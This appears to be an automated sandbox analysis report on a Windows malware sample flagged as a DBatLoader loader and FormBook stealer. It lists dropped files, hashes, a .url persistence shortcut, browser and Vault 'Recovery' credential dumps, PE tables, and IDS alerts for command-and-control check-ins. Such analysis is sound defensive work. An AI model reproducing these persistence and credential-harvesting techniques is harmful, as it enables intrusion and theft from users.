                          Preview: ...9".J[..W.6..j.9(.S..w...9'n...FJO....s./......O..].".Q.h.......K...m.....t0.|3.l..d.I../.0...a....`r-.M....#t8..e.NU...]..^|;:.%s.....I.~6.{...=+..;2....S.....Q..D... .*...7(..b.U....^|;:.%s.....I.~6.{...=+..;2....S.....Q..D... .*..-.....XLt:..<..M..... ...LB.bdo..#m..|*.e.(.....M.p93v95.flg....]...B..'g.....n...&...'g..B......Z@.pJo...s...3...]....J\j.....G...:.k.+m..%m.. ....Tq.rT..t=@..~.....A.J..e.u.Q..o..~-..........Y..e.".....Vr<........../)..\.M............i.$y...A.A.A...Yb.w!..z..M]j...A.<U.|.S.-.]...?...$.F.V.Z..|....p.9.....N..........6......J.L.+..8(."..~o.W:..Co.*_..&zu2.pf.`..10H..mL.y.*..X..[j......_y(r.]h0...."B..m.?....*......Ym3.z.?.N.j....G[h.\.'....4..1..u%.^...V.Un...[q?.....f..<*.........*s(....^..v...[`.N... q!.IIT.M]y-.B<,.~..9...\..f..,.MIP.....3..V.N.y1.v..=.T.85..Ua}:!..Q@+..B4.h....KD!.9.=.(....OL.j..IL...p..._t......^.N..."4.`.`.ami."..,.$..}?..,...n..."a%.=...L...&`.C.....?..KA.....7.V...e.(.....KL.Uw7
                          C:\Users\user\AppData\Local\Temp\DB1
                          Process:C:\Windows\SysWOW64\cmd.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                          Category:dropped
                          Size (bytes):40960
                          Entropy (8bit):0.792852251086831
                          Encrypted:false
                          SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                          MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                          SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                          SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                          SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                          Malicious:false
                          Reputation:unknown
                          Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Roaming\75A8527W\75Alogim.jpeg
                          Process:C:\Windows\SysWOW64\help.exe
                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
                          Category:dropped
                          Size (bytes):84210
                          Entropy (8bit):7.899916323972779
                          Encrypted:false
                          SSDEEP:1536:CFhcbVt7TdPoG994uZCUZvPbhp//88Y3TaScmwJ8n/t+kZ+jCsM6cVdy:Ihu8GMuZCqnbj//Y3riRkpX6Edy
                          MD5:9F895E0E872E4CCFA683538D897279E1
                          SHA1:E6C4F5723ACDEDB51A7007AE174D74E6C1C4D2D3
                          SHA-256:DBD88EA6303BF4A200CE933CBAD16645C5D7E591751B98A0BAD1DBDE5D8A743A
                          SHA-512:6E47AF63E4394C2430AACB86784E5F664960F52E146A3127FBA81C635F40B4BCD7F423987480FF2569FC4FCE1CB7370EA4AACDB569AD7EE44A9BF1A3CAFAB6E6
                          Malicious:false
                          Reputation:unknown
                          Preview: ......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.A.:.....X.l..1lN23....._....m.....'.........S.. ..W....'.c....1....5.5.}j.Ly..k;.\...q.U..Q...bgJpW.(QKI]&b.QE.&(.._.C.....B...-..h.Dh......{..J*.qNN...Z......?......................./.H.v..O.|......I"]Z...I.y..[
                          C:\Users\user\AppData\Roaming\75A8527W\75Alogrg.ini
                          Process:C:\Windows\SysWOW64\help.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):38
                          Entropy (8bit):2.7883088224543333
                          Encrypted:false
                          SSDEEP:3:rFGQJhIl:RGQPY
                          MD5:4AADF49FED30E4C9B3FE4A3DD6445EBE
                          SHA1:1E332822167C6F351B99615EADA2C30A538FF037
                          SHA-256:75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
                          SHA-512:EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
                          Malicious:false
                          Reputation:unknown
                          Preview: ....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....
                          C:\Users\user\AppData\Roaming\75A8527W\75Alogri.ini
                          Process:C:\Windows\SysWOW64\help.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):40
                          Entropy (8bit):2.8420918598895937
                          Encrypted:false
                          SSDEEP:3:+slXllAGQJhIl:dlIGQPY
                          MD5:D63A82E5D81E02E399090AF26DB0B9CB
                          SHA1:91D0014C8F54743BBA141FD60C9D963F869D76C9
                          SHA-256:EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
                          SHA-512:38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
                          Malicious:true
                          Reputation:unknown
                          Preview: ....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....
                          C:\Users\user\AppData\Roaming\75A8527W\75Alogrv.ini
                          Process:C:\Windows\SysWOW64\help.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):210
                          Entropy (8bit):3.482329440248704
                          Encrypted:false
                          SSDEEP:6:tGQPYlIaExGNlGcQga3Of9y96GO4yRl2rK9dEoY:MlIaExGNYvOI6x4+2rqY
                          MD5:F06976F974E77FCC372A01603909BA74
                          SHA1:8810DEB0B9350EB4B9A4944FE488551275C2AEDA
                          SHA-256:D47B5E60BF213D7462CD33A88D49525F3386D773016DAE2AFADE8F4B5A330EFB
                          SHA-512:742E06D22ACAA67705C3E31C32B3F2D086C509D1E5051EB431EF4D80BAF4F07742E415599EAE4E1200420F64F045D56A321A980F339B18052211AE44FD3437F2
                          Malicious:true
                          Reputation:unknown
                          Preview: ...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.........N.a.m.e.:...M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.t.a.r.g.e.t.=.S.S.O._.P.O.P._.D.e.v.i.c.e.....I.d.:...0.2.i.y.v.x.c.v.d.z.s.g.u.h.l.n.....A.u.t.:.......P.a.s.s.:.......
                          C:\Users\user\Contacts\Hyrzbcwcas.exe
                          Process:C:\Users\user\Desktop\WZ454554.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):807424
                          Entropy (8bit):6.9359553859707095
                          Encrypted:false
                          SSDEEP:24576:0tXZPH7fBQJyk/0fHvmd8MKTD9/J+fyAB5:KV885T5m
                          MD5:58B39C2620CDDA3D3FA6A125F476FC9F
                          SHA1:5D2672C79E9DFFB2CDEEE0D00E406C03C762985C
                          SHA-256:FDF39D043CC55D6A72B1FE01C9067BB7591D5C379798499148521E6158AFEEA0
                          SHA-512:98E5DD2734FD7AC0515E834F0AFC817DE1135503C493C3037F6F1E60C070E24E2F34C53ED08A215AFFD2F3ADD1E79CC0E6559C9A02C4431B40C2C6B1A89A522F
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\user\Contacts\Hyrzbcwcas.exe, Author: Joe Security
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 39%
                          Reputation:unknown
                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.........................................@..............................................@...........................@...+...............................v...................................................H...............................text....k.......l.................. ..`.itext..H............p.............. ..`.data....X.......Z..................@....bss.....;...............................idata...+...@...,..................@....tls....4....p...........................rdata..............................@..@.reloc...v.......x..................@..B.rsrc...............................@..@.....................R..............@..@................................................................................................
                          C:\Users\user\Contacts\Hyrzbcwcas.exe:Zone.Identifier
                          Process:C:\Users\user\Desktop\WZ454554.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Reputation:unknown
                          Preview: [ZoneTransfer]....ZoneId=0
                          C:\Users\user\Contacts\sacwcbzryH.url
                          Process:C:\Users\user\Desktop\WZ454554.exe
                          File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\user\\Contacts\\Hyrzbcwcas.exe">), ASCII text, with CRLF line terminators
                          Category:modified
                          Size (bytes):100
                          Entropy (8bit):4.936405505932685
                          Encrypted:false
                          SSDEEP:3:HRAbABGQYmTWAX+T+Bf5rie8EWmvsGKd/W9K:HRYFVmTWD0pzVWmvsb/W9K
                          MD5:6E338427109AB2D376E62A8EE9E69477
                          SHA1:3D91FEEDFAC3C367E31ACB301AB3A3F2A116042A
                          SHA-256:F9E3D569335854ED6FE1C0AB38E28330D6E4E1882591289F2B040CAC6A1CD1A7
                          SHA-512:E5455CDC60BC43D3A332E95883DBB646BAF1E9B05AF8063A90BB1C9BBD6DE01880AFD4FEA28CF5788CF447065374E7F70E40A2A6C1694CDABC25E7E7595A1407
                          Malicious:false
                          Yara Hits:
                          • Rule: Methodology_Shortcut_HotKey, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\Contacts\sacwcbzryH.url, Author: @itsreallynick (Nick Carr)
                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\Contacts\sacwcbzryH.url, Author: @itsreallynick (Nick Carr)
                          Reputation:unknown
                          Preview: [InternetShortcut]..URL=file:"C:\\Users\\user\\Contacts\\Hyrzbcwcas.exe"..IconIndex=71..HotKey=37..

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):6.9359553859707095
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.38%
                          • InstallShield setup (43055/19) 0.43%
                          • Windows Screen Saver (13104/52) 0.13%
                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          File name:WZ454554.exe
                          File size:807424
                          MD5:58b39c2620cdda3d3fa6a125f476fc9f
                          SHA1:5d2672c79e9dffb2cdeee0d00e406c03c762985c
                          SHA256:fdf39d043cc55d6a72b1fe01c9067bb7591d5c379798499148521e6158afeea0
                          SHA512:98e5dd2734fd7ac0515e834f0afc817de1135503c493c3037f6f1e60c070e24e2f34c53ed08a215affd2f3add1e79cc0e6559c9a02c4431b40c2c6b1a89a522f
                          SSDEEP:24576:0tXZPH7fBQJyk/0fHvmd8MKTD9/J+fyAB5:KV885T5m
                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                          File Icon

                          Icon Hash:e4eea286a4b4bcb4

                          Static PE Info

                          General

                          Entrypoint:0x4793d4
                          Entrypoint Section:.itext
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                          DLL Characteristics:
                          Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:030d446cabf252026c031abcf4f0ab07

                          Entrypoint Preview

                          Instruction
                          push ebp
                          mov ebp, esp
                          add esp, FFFFFFF0h
                          mov eax, 00477950h
                          call 00007FA300DFC921h
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          nop
                          mov eax, dword ptr [0047F6E4h]
                          mov eax, dword ptr [eax]
                          call 00007FA300E4FB47h
                          mov eax, dword ptr [0047F6E4h]
                          mov eax, dword ptr [eax]
                          mov edx, 0047943Ch
                          call 00007FA300E4F5CEh
                          mov ecx, dword ptr [0047F470h]
                          mov eax, dword ptr [0047F6E4h]
                          mov eax, dword ptr [eax]
                          mov edx, dword ptr [00477438h]
                          call 00007FA300E4FB36h
                          mov eax, dword ptr [0047F6E4h]
                          mov eax, dword ptr [eax]
                          call 00007FA300E4FBAAh
                          call 00007FA300DFA629h

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x840000x2b0e.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x910000x3cc00.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x890000x76b8.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x880000x18.rdata
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x848000x6ac.idata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x76bf80x76c00False0.525567434211data6.60247687013IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          .itext0x780000x14480x1600False0.510653409091data5.75400115895IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          .data0x7a0000x58b00x5a00False0.634635416667data6.11695147571IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          .bss0x800000x3b9c0x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          .idata0x840000x2b0e0x2c00False0.311257102273data5.00399365969IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          .tls0x870000x340x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          .rdata0x880000x180x200False0.05078125data0.210826267787IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0x890000x76b80x7800False0.627376302083data6.67138909841IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          .rsrc0x910000x3cc000x3cc00False0.431238747428data6.86350480663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountry
                          RT_CURSOR0x920480x134dataEnglishUnited States
                          RT_CURSOR0x9217c0x134dataEnglishUnited States
                          RT_CURSOR0x922b00x134dataEnglishUnited States
                          RT_CURSOR0x923e40x134dataEnglishUnited States
                          RT_CURSOR0x925180x134dataEnglishUnited States
                          RT_CURSOR0x9264c0x134dataEnglishUnited States
                          RT_CURSOR0x927800x134dataEnglishUnited States
                          RT_BITMAP0x928b40x1d0dataEnglishUnited States
                          RT_BITMAP0x92a840x1e4dataEnglishUnited States
                          RT_BITMAP0x92c680x1d0dataEnglishUnited States
                          RT_BITMAP0x92e380x1d0dataEnglishUnited States
                          RT_BITMAP0x930080x1d0dataEnglishUnited States
                          RT_BITMAP0x931d80x1d0dataEnglishUnited States
                          RT_BITMAP0x933a80x1d0dataEnglishUnited States
                          RT_BITMAP0x935780x1d0dataEnglishUnited States
                          RT_BITMAP0x937480x1d0dataEnglishUnited States
                          RT_BITMAP0x939180x1d0dataEnglishUnited States
                          RT_BITMAP0x93ae80xe8GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_BITMAP0x93bd00x46b8dataRussianRussia
                          RT_ICON0x982880x2e8data
                          RT_ICON0x985700x128GLS_BINARY_LSB_FIRST
                          RT_ICON0x986980xea8data
                          RT_ICON0x995400x8a8data
                          RT_ICON0x99de80x568GLS_BINARY_LSB_FIRST
                          RT_ICON0x9a3500x25a8data
                          RT_ICON0x9c8f80x10a8data
                          RT_ICON0x9d9a00x468GLS_BINARY_LSB_FIRST
                          RT_DIALOG0x9de080x52data
                          RT_DIALOG0x9de5c0x52data
                          RT_DIALOG0x9deb00x248dataRussianRussia
                          RT_DIALOG0x9e0f80x11cdataRussianRussia
                          RT_DIALOG0x9e2140x18cdataRussianRussia
                          RT_DIALOG0x9e3a00x1e2dataRussianRussia
                          RT_DIALOG0x9e5840x1fedataRussianRussia
                          RT_DIALOG0x9e7840x29edataRussianRussia
                          RT_DIALOG0x9ea240x178dataRussianRussia
                          RT_DIALOG0x9eb9c0x290dataRussianRussia
                          RT_DIALOG0x9ee2c0xd0cdataRussianRussia
                          RT_DIALOG0x9fb380x268dataRussianRussia
                          RT_STRING0x9fda00x504dataRussianRussia
                          RT_STRING0xa02a40x41edataRussianRussia
                          RT_STRING0xa06c40x19edataRussianRussia
                          RT_STRING0xa08640xaccdata
                          RT_STRING0xa13300x624data
                          RT_STRING0xa19540x2b4data
                          RT_STRING0xa1c080xb4data
                          RT_STRING0xa1cbc0xf0data
                          RT_STRING0xa1dac0x22cdata
                          RT_STRING0xa1fd80x3d8data
                          RT_STRING0xa23b00x388data
                          RT_STRING0xa27380x370data
                          RT_STRING0xa2aa80x3c8data
                          RT_STRING0xa2e700xd4data
                          RT_STRING0xa2f440xa4data
                          RT_STRING0xa2fe80x2a0data
                          RT_STRING0xa32880x458data
                          RT_STRING0xa36e00x38cdata
                          RT_STRING0xa3a6c0x2b4data
                          RT_RCDATA0xa3d200x10data
                          RT_RCDATA0xa3d300x38cdata
                          RT_RCDATA0xa40bc0x96aRIFF (little-endian) data, WAVE audio, MPEG Layer 3, mono 11025 HzEnglishUnited States
                          RT_RCDATA0xa4a280x866RIFF (little-endian) data, WAVE audio, MPEG Layer 3, mono 11025 HzEnglishUnited States
                          RT_RCDATA0xa52900x27fe2RIFF (little-endian) data, WAVE audio, Microsoft PCM, 8 bit, mono 22050 HzEnglishUnited States
                          RT_RCDATA0xcd2740x222Delphi compiled form 'T__649235470'
                          RT_GROUP_CURSOR0xcd4980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                          RT_GROUP_CURSOR0xcd4ac0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                          RT_GROUP_CURSOR0xcd4c00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                          RT_GROUP_CURSOR0xcd4d40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                          RT_GROUP_CURSOR0xcd4e80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                          RT_GROUP_CURSOR0xcd4fc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                          RT_GROUP_CURSOR0xcd5100x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                          RT_GROUP_ICON0xcd5240x76data
                          RT_VERSION0xcd59c0x358dataRussianRussia
                          RT_MANIFEST0xcd8f40x1eeXML 1.0 document, ASCII text, with very long lines, with no line terminatorsRussianRussia

                          Imports

                          DLLImport
                          oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                          user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                          kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                          kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                          user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CharNextW, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                          gdi32.dllUnrealizeObject, StretchDIBits, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetPaletteEntries, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, ResizePalette, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, LPtoDP, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetTextAlign, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetROP2, GetPolyFillMode, GetPixelFormat, GetPixel, GetPaletteEntries, GetObjectA, GetNearestPaletteIndex, GetMapMode, GetGraphicsMode, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetDCPenColor, GetDCBrushColor, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBkMode, GetBkColor, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CloseEnhMetaFile, BitBlt
                          version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                          kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryW, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteFileA, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                          oleaut32.dllGetErrorInfo, SysFreeString
                          ole32.dllCreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
                          kernel32.dllSleep
                          oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                          comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                          kernel32AddAtomA

                          Version Infos

                          DescriptionData
                          LegalCopyright????????? ????? 2007-2008 Maksim V
                          InternalNameStrMaS EFxxer
                          FileVersion13.0.1.2
                          CompanyNameMaS EFxx
                          LegalTrademarksStrMaS EFxxyer
                          ProductNameSMaS EFxxer - Reload Edition
                          ProductVersion2.0.1.2
                          FileDescriptionStrMaS EFxxayer
                          OriginalFilenamePlayMaS EFx.CPL
                          Translation0x0419 0x04e4

                          Possible Origin

                          Language of compilation systemCountry where language is spokenMap
                          EnglishUnited States
                          RussianRussia

                          Network Behavior

                          Snort IDS Alerts

                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                          01/13/22-20:23:52.812988TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981780192.168.2.334.102.136.180
                          01/13/22-20:23:52.812988TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981780192.168.2.334.102.136.180
                          01/13/22-20:23:52.812988TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981780192.168.2.334.102.136.180
                          01/13/22-20:23:52.928047TCP1201ATTACK-RESPONSES 403 Forbidden804981734.102.136.180192.168.2.3

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Jan 13, 2022 20:22:17.443627119 CET49746443192.168.2.3162.159.130.233
                          Jan 13, 2022 20:22:17.443675995 CET44349746162.159.130.233192.168.2.3
                          Jan 13, 2022 20:22:17.443768024 CET49746443192.168.2.3162.159.130.233
